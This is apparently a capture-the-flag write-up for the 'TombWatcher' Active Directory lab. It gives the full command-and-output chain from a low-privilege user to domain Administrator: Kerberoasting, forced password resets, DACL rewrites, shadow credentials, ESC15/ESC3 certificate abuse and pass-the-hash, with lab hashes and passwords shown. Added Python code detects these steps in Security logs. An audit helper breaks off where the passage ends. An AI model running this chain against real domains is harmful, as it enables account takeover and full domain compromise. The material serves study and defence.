Proof of Concept
10.129.232.167
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Information Gathering
Host information gathering
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc smb 10.129.232.167 --generate-hosts-file hosts
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat hosts
10.129.232.167 DC01.tombwatcher.htb tombwatcher.htb DC01
Add the entry to /etc/hosts
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat /etc/hosts
<SNIP>
10.129.232.167 DC01.tombwatcher.htb tombwatcher.htb DC01
BloodHound data collection
┌──(kali🎃kali)-[~/TombWatcher]
└─$ bloodhound-python -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!' -ns 10.129.232.167 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Testing resolved hostname connectivity dead:beef::c445:184b:9f34:c94e
INFO: Trying LDAP connection to dead:beef::c445:184b:9f34:c94e
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Testing resolved hostname connectivity dead:beef::c445:184b:9f34:c94e
INFO: Trying LDAP connection to dead:beef::c445:184b:9f34:c94e
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc00000ac - STATUS_PIPE_NOT_AVAILABLE - An instance of a named pipe cannot be found in the listening state.
INFO: Done in 00M 46S
Auth as Alfred
henry / H3nry_987TGV!
Checked the bloodhound-ce
- The user HENRY@TOMBWATCHER.HTB has the ability to write to the “serviceprincipalname” attribute to the user ALFRED@TOMBWATCHER.HTB.
Synchronize time with the DC
┌──(kali🎃kali)-[~/TombWatcher]
└─$ sudo timedatectl set-ntp off
┌──(kali🎃kali)-[~/TombWatcher]
└─$ sudo rdate -n 10.129.232.167
Tue Jan 13 14:08:17 EST 2026
Perform Kerberoasting
- Obtained Alfred's hash
┌──(kali🎃kali)-[~/TombWatcher]
└─$ ./targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$4f2fdd510307868317ad302f4dff03d0$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
[VERBOSE] SPN removed successfully for (Alfred)
Crack the hash
- Obtained Alfred's plaintext password
- basketball
┌──(kali🎃kali)-[~/TombWatcher]
└─$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --quiet
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$4f2fdd510307868317ad302f4dff03d0$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:basketball
SMB authentication succeeded as Alfred/basketball
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ nxc smb 10.129.232.167 -u 'Alfred' -p 'basketball'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\Alfred:basketball
Auth as ANSIBLE_DEV
Checked the bloodhound-ce
- The user ALFRED@TOMBWATCHER.HTB has the ability to add itself, to the group INFRASTRUCTURE@TOMBWATCHER.HTB. Because of security group delegation, the members of a security group have the same privileges as that group.
- ANSIBLE_DEV@TOMBWATCHER.HTB.
Add Alfred to the INFRASTRUCTURE group
┌──(kali🎃kali)-[~/TombWatcher]
└─$ bloodyAD -d 'tombwatcher.htb' -u 'Alfred' -p 'basketball' --host '10.129.232.167' add groupMember INFRASTRUCTURE Alfred
[+] Alfred added to INFRASTRUCTURE
Obtain the NTLM hash of the ansible_dev$ account
- 22d7972cb291784b28f3b6f5bc79e4cf
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc ldap dc01.tombwatcher.htb -u 'Alfred' -p 'basketball' --gmsa
LDAP 10.129.232.167 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb)
LDAPS 10.129.232.167 636 DC01 [+] tombwatcher.htb\Alfred:basketball
LDAPS 10.129.232.167 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.232.167 636 DC01 Account: ansible_dev$ NTLM: 22d7972cb291784b28f3b6f5bc79e4cf PrincipalsAllowedToReadPassword: Infrastructure
SMB authentication as ansible_dev$ succeeded using the obtained NTLM hash
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ nxc smb 10.129.232.167 -u 'ansible_dev$' -H '22d7972cb291784b28f3b6f5bc79e4cf'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\ansible_dev$:22d7972cb291784b28f3b6f5bc79e4cf
Auth as SAM
Checked the bloodhound-ce
- The user ANSIBLE_DEV$@TOMBWATCHER.HTB has the capability to change the user SAM@TOMBWATCHER.HTB’s password without knowing that user’s current password.
Changed the user SAM’s password to “1q2w3e4r”
┌──(kali🎃kali)-[~/TombWatcher]
└─$ bloodyAD --host 'dc01.tombwatcher.htb' -u 'ansible_dev$' -p ':22d7972cb291784b28f3b6f5bc79e4cf' set password sam '1q2w3e4r'
[+] Password changed successfully!
SMB authentication as SAM succeeded with the changed password
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc smb dc01.tombwatcher.htb -u 'sam' -p '1q2w3e4r'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\sam:1q2w3e4r
Auth as JOHN
Checked the bloodhound-ce
- The user SAM@TOMBWATCHER.HTB has the ability to modify the owner of the user JOHN@TOMBWATCHER.HTB.
Change ownership
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ impacket-owneredit -action write -new-owner SAM -target JOHN tombwatcher.htb/SAM:'1q2w3e4r' -dc-ip 10.129.232.167
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-1105
[*] - sAMAccountName: sam
[*] - distinguishedName: CN=sam,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
Grant GenericAll rights
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ impacket-dacledit -action write -rights FullControl -principal SAM -target JOHN tombwatcher.htb/SAM:'1q2w3e4r' -dc-ip 10.129.232.167
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260113-144929.bak
[*] DACL modified successfully!
Force password change
- JOHN / 1q2w3e4r
┌──(kali🎃kali)-[~/TombWatcher/pywhisker/pywhisker]
└─$ net rpc password "JOHN" "1q2w3e4r" -U "tombwatcher.htb"/"SAM"%"1q2w3e4r" -S "DC01.tombwatcher.htb"
SMB authentication as JOHN succeeded
┌──(kali🎃kali)-[~/TombWatcher/pywhisker/pywhisker]
└─$ nxc smb 10.129.232.167 -u 'JOHN' -p '1q2w3e4r'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\JOHN:1q2w3e4r
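Every step in the chain so far leaves a Security event on the DC: the SPN write on Alfred (5136), the RC4 service-ticket request that produced the $krb5tgs$23$ hash (4769), Alfred adding itself to INFRASTRUCTURE (4728), the password reset on sam (4724) and the owner/DACL rewrite on john (5136 on nTSecurityDescriptor); the msDS-KeyCredentialLink write used later against cert_admin lands in the same 5136 stream. The following detection logic is an added example, not part of the original writeup: the event records are constructed by hand to mirror those steps (field names follow the Security log schema; values, timestamps and DNs are made up), and the allowlist parameter is an assumption for excluding a legitimate SPN-management account.

```python
"""
Detection checks for the ACL-abuse chain in this writeup, run over constructed
Windows Security events. Added example, not part of the original post: the
records are hand-built to carry the fields the checks read (names follow the
Security log schema for 5136/4769/4724/4728) and are not logs from the box.
"""
from datetime import datetime, timedelta

# 5136 (directory object modified) attributes worth an alert when an ordinary
# user writes them, mapped to the step in the chain each one enables.
WATCHED_ATTRIBUTES = {
    "servicePrincipalName": "targeted Kerberoasting",
    "member": "group membership change",
    "nTSecurityDescriptor": "owner/DACL rewrite",
    "msDS-KeyCredentialLink": "shadow credentials",
}
RC4_HMAC = "0x17"  # 4769 TicketEncryptionType for RC4, the source of $krb5tgs$23$ hashes

# Constructed sample events; values are made up to mirror the writeup's steps.
SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2026-01-13T14:09:00", "SubjectUserName": "henry",
     "ObjectDN": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "Value Added"},
    {"EventID": 4769, "Time": "2026-01-13T14:09:02", "TargetUserName": "henry@TOMBWATCHER.HTB",
     "ServiceName": "Alfred", "TicketEncryptionType": "0x17"},
    {"EventID": 5136, "Time": "2026-01-13T14:09:03", "SubjectUserName": "henry",
     "ObjectDN": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "Value Deleted"},
    {"EventID": 4728, "Time": "2026-01-13T14:20:00", "SubjectUserName": "Alfred",
     "MemberName": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb", "TargetUserName": "Infrastructure"},
    {"EventID": 4724, "Time": "2026-01-13T14:30:00", "SubjectUserName": "ansible_dev$",
     "TargetUserName": "sam"},
    {"EventID": 5136, "Time": "2026-01-13T14:49:00", "SubjectUserName": "sam",
     "ObjectDN": "CN=john,CN=Users,DC=tombwatcher,DC=htb",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "Value Added"},
    {"EventID": 5136, "Time": "2026-01-18T15:20:00", "SubjectUserName": "john",
     "ObjectDN": "CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    # Benign control: AES service ticket for the DC's own service, must not match.
    {"EventID": 4769, "Time": "2026-01-13T14:10:00", "TargetUserName": "sam@TOMBWATCHER.HTB",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def _cn(dn):
    """Leftmost RDN value, lower-cased: 'CN=Alfred,CN=Users,...' -> 'alfred'."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()


def sensitive_attribute_writes(events, allowlist=()):
    """Every 5136 touching a watched attribute, minus allowlisted subjects."""
    skip = {a.lower() for a in allowlist}
    hits = []
    for e in events:
        attr = e.get("AttributeLDAPDisplayName")
        if e["EventID"] == 5136 and attr in WATCHED_ATTRIBUTES \
                and e["SubjectUserName"].lower() not in skip:
            hits.append((e["SubjectUserName"].lower(), _cn(e["ObjectDN"]),
                         attr, WATCHED_ATTRIBUTES[attr]))
    return hits


def targeted_kerberoast_sequences(events, window=timedelta(minutes=10)):
    """SPN added to a user, RC4 TGS for that user requested by the same subject,
    SPN removed again: the add/roast/cleanup pattern of targetedKerberoast."""
    def spn_change(e, op):
        return (e["EventID"] == 5136 and e.get("OperationType") == op
                and e.get("AttributeLDAPDisplayName") == "servicePrincipalName")

    found = []
    for add in (e for e in events if spn_change(e, "Value Added")):
        subject, target, t0 = add["SubjectUserName"].lower(), _cn(add["ObjectDN"]), _ts(add)

        def in_window(e):
            return t0 <= _ts(e) <= t0 + window

        roasted = any(e["EventID"] == 4769 and in_window(e)
                      and e["ServiceName"].lower() == target
                      and e["TicketEncryptionType"] == RC4_HMAC
                      and e["TargetUserName"].split("@")[0].lower() == subject
                      for e in events)
        cleaned = any(spn_change(e, "Value Deleted") and in_window(e)
                      and _cn(e["ObjectDN"]) == target
                      and e["SubjectUserName"].lower() == subject for e in events)
        if roasted and cleaned:
            found.append((subject, target))
    return found


def self_group_additions(events):
    """4728/4732/4756 where the subject added their own account to the group."""
    return [(e["SubjectUserName"].lower(), e["TargetUserName"])
            for e in events if e["EventID"] in (4728, 4732, 4756)
            and _cn(e["MemberName"]) == e["SubjectUserName"].lower()]


def third_party_password_resets(events):
    """4724 where someone other than the account owner reset the password."""
    return [(e["SubjectUserName"].lower(), e["TargetUserName"].lower())
            for e in events if e["EventID"] == 4724
            and e["SubjectUserName"].lower() != e["TargetUserName"].lower()]


if __name__ == "__main__":
    for label, check in [("attribute writes", sensitive_attribute_writes),
                         ("targeted kerberoast", targeted_kerberoast_sequences),
                         ("self group add", self_group_additions),
                         ("password resets", third_party_password_resets)]:
        print(f"{label}: {check(SAMPLE_EVENTS)}")
```

The SPN-add/RC4-TGS/SPN-delete correlation is the high-confidence signal: a single SPN write can be routine, but the same principal writing one, requesting an RC4 ticket for that account and removing it within minutes matches the targetedKerberoast.py output above line for line. The attribute watchlist needs the "Write all properties" SACL on user objects for 5136 to fire at all, which is the usual gap on a default DC.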
Connect with evil-winrm
┌──(kali🎃kali)-[~/TombWatcher/pywhisker/pywhisker]
└─$ evil-winrm -i 10.129.232.167 -u 'JOHN' -p '1q2w3e4r'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents>
Read user.txt
*Evil-WinRM* PS C:\Users\john\Desktop> type user.txt
ffb880f84c3d0bce09873fa3489bb846
*Evil-WinRM* PS C:\Users\john\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f644:dcfa:6455:35cd
Link-local IPv6 Address . . . . . : fe80::a820:667f:4301:f7d6%5
IPv4 Address. . . . . . . . . . . : 10.129.232.167
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%5
10.10.10.2
10.129.0.1
Privilege Escalation (john to cert_admin)
Checked the bloodhound-ce
- The user JOHN@TOMBWATCHER.HTB has GenericAll permissions to the OU ADCS@TOMBWATCHER.HTB.
Enumerate the AD CS environment with Certipy (vulnerability scan)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad find -u 'john' -p '1q2w3e4r' -target 10.129.232.167
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Failed to lookup object with SID 'S-1-5-21-1392491010-1358638721-2126982587-1111'
[*] Saving text output to '20260118150901_Certipy.txt'
[*] Wrote text output to '20260118150901_Certipy.txt'
[*] Saving JSON output to '20260118150901_Certipy.json'
[*] Wrote JSON output to '20260118150901_Certipy.json'
S-1-5-21-1392491010-1358638721-2126982587-1111 has Enrollment Rights on the WebServer template
- But since this SID cannot be resolved to a user, it is presumed to belong to a deleted account
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat 20260118150901_Certipy.txt
<SNIP>
17
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
Query deleted AD users
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
<SNIP>
CN : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage : 0
countryCode : 0
Created : 11/16/2024 12:07:04 PM
createTimeStamp : 11/16/2024 12:07:04 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 11/16/2024 12:07:27 PM
modifyTimeStamp : 11/16/2024 12:07:27 PM
msDS-LastKnownRDN : cert_admin
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133762504248946345
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 13197
uSNCreated : 13186
whenChanged : 11/16/2024 12:07:27 PM
whenCreated : 11/16/2024 12:07:04 PM
Restore the deleted account
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADUser cert_admin
DistinguishedName : CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
Enabled : True
GivenName : cert_admin
Name : cert_admin
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
SamAccountName : cert_admin
SID : S-1-5-21-1392491010-1358638721-2126982587-1111
Surname : cert_admin
UserPrincipalName :
Shadow Credentials attack
- Obtained cert_admin's NTLM hash
- f87ebf0febd9c4095c68a88928755773
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad shadow auto -u 'JOHN@tombwatcher.htb' -p '1q2w3e4r' -dc-ip 10.129.232.167 -account cert_admin
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'cert_admin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7d1adece47e04e15990894194297388d'
[*] Adding Key Credential with device ID '7d1adece47e04e15990894194297388d' to the Key Credentials for 'cert_admin'
[*] Successfully added Key Credential with device ID '7d1adece47e04e15990894194297388d' to the Key Credentials for 'cert_admin'
[*] Authenticating as 'cert_admin' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'cert_admin@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'cert_admin.ccache'
[*] Wrote credential cache to 'cert_admin.ccache'
[*] Trying to retrieve NT hash for 'cert_admin'
[*] Restoring the old Key Credentials for 'cert_admin'
[*] Successfully restored the old Key Credentials for 'cert_admin'
[*] NT hash for 'cert_admin': f87ebf0febd9c4095c68a88928755773
SMB authentication as cert_admin succeeded
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc smb 10.129.232.167 -u 'cert_admin' -H 'f87ebf0febd9c4095c68a88928755773'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\cert_admin:f87ebf0febd9c4095c68a88928755773
Privilege Escalation (cert_admin to Administrator)
Vulnerability scan with Certipy
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad find -u 'cert_admin' -hashes 'f87ebf0febd9c4095c68a88928755773' -target 10.129.232.167
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260119142917_Certipy.txt'
[*] Wrote text output to '20260119142917_Certipy.txt'
[*] Saving JSON output to '20260119142917_Certipy.json'
[*] Wrote JSON output to '20260119142917_Certipy.json'
ESC15 vulnerability found in the WebServer template
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat 20260119142917_Certipy.txt
<SNIP>
17
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
ESC15 exploitation
Inject the Certificate Request Agent application policy into a WebServer template request (CVE-2024-49019)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad req \
-u 'cert_admin@tombwatcher.htb' -hashes 'f87ebf0febd9c4095c68a88928755773' \
-dc-ip '10.129.232.167' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-application-policies 'Certificate Request Agent'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'cert_admin.pfx'
[*] Wrote certificate and private key to 'cert_admin.pfx'
Request the User template on behalf of Administrator with the Enrollment Agent certificate (ESC3)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad req \
-u 'cert_admin' -hashes 'f87ebf0febd9c4095c68a88928755773' \
-dc-ip '10.129.232.167' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'User' \
-pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Kerberos authentication with the Administrator certificate and NT hash extraction
- Administrator : f61db423bebe3328d33af26741afe5fc
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.129.232.167'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc
Pass-the-Hash login with the Administrator NT hash
┌──(kali🎃kali)-[~/TombWatcher]
└─$ evil-winrm -i 10.129.232.167 -u 'administrator' -H 'f61db423bebe3328d33af26741afe5fc'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
410875990f24ff2d96279fb152af5e73
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::92ef:92a:4197:3c0
Link-local IPv6 Address . . . . . : fe80::bf9a:823f:118c:f510%5
IPv4 Address. . . . . . . . . . . : 10.129.232.167
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.10.10.2
10.129.0.1
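The two Certipy reports above show the same WebServer template twice: first with an unresolved SID (...-1111) holding Enrollment Rights, then, after Restore-ADObject, with TOMBWATCHER.HTB\cert_admin in its place and ESC15 reported. A defender reviewing such a report wants both signals: the ESC15 shape itself (schema version 1, enrollee supplies subject, no manager approval, no required signatures, a non-admin enrollment principal) and enrollment ACEs that point at SIDs which no longer resolve, because that ACE becomes live again the moment the deleted object is restored. The audit helper below is an added example, not Certipy's own code: it parses template blocks in the flattened key : value layout shown on this page. The report text is constructed; the WebServer values are taken from the page, while StaleTemplate and Workstation are made-up control cases.

```python
"""
Audit helper for Certipy's text report as laid out on this page. Added
example, not Certipy's code. Parses 'Template Name : ...' blocks, flags the
ESC15 pre-conditions with a non-admin enrollment principal, and separately
reports enrollment ACEs held by SIDs that no longer resolve (the deleted
cert_admin case). The report excerpt is constructed: WebServer values come
from the page, StaleTemplate and Workstation are made-up controls.
"""
import re

PRIVILEGED = {"Domain Admins", "Enterprise Admins"}
SID_RE = re.compile(r"^S-1-\d+(?:-\d+)+$")  # an unresolved principal shows as a raw SID
SECTION_HEADERS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}

SAMPLE_REPORT = r"""
17
Template Name : WebServer
Display Name : Web Server
Enabled : True
Client Authentication : False
Enrollee Supplies Subject : True
Requires Manager Approval : False
Authorized Signatures Required : 0
Schema Version : 1
Template Created : 2024-11-16T00:57:49+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
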